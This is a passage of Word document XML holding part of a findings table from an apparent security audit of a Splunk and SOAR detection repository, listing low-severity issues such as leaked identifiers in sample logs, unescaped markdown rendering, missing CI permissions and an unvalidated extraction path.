            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Incomplete sanitisation of CloudTrail example logs leaks real AWS account IDs, access-key IDs, principals, roles and buckets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Personal data of employees and residential IP addresses embedded in sample logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Internal infrastructure and cloud-tenant identifiers disclosed (hostnames, private URLs, tenant GUIDs, S3 buckets, playground endpoint)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Missing top-level permissions: blocks and use of a personal access token where a scoped token would do</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker-controlled values rendered unescaped into SOAR markdown notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Allow-list bypass by self-tagging in aws_disable_user_accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>debug.py and passthrough.py log full input values (sensitive data to logs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Bare except: and broad exception handling swallow errors (validate_yaml.py, ta_update.py)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>default.meta exports all knowledge objects system-wide with admin/sc_admin write (tampering surface)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk app and dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Validation via assert statements (stripped under python -O)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Missing None/type guards and empty-cell substring logic bug (custom_list_value_in_strings)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>base64_decode: fail-open decoding, NUL stripping and non-ASCII drop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>zip_extract: unvalidated vault_id used to build the temp extraction path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR custom functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PR-controlled detection name/exception rendered unescaped into the GitHub step summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
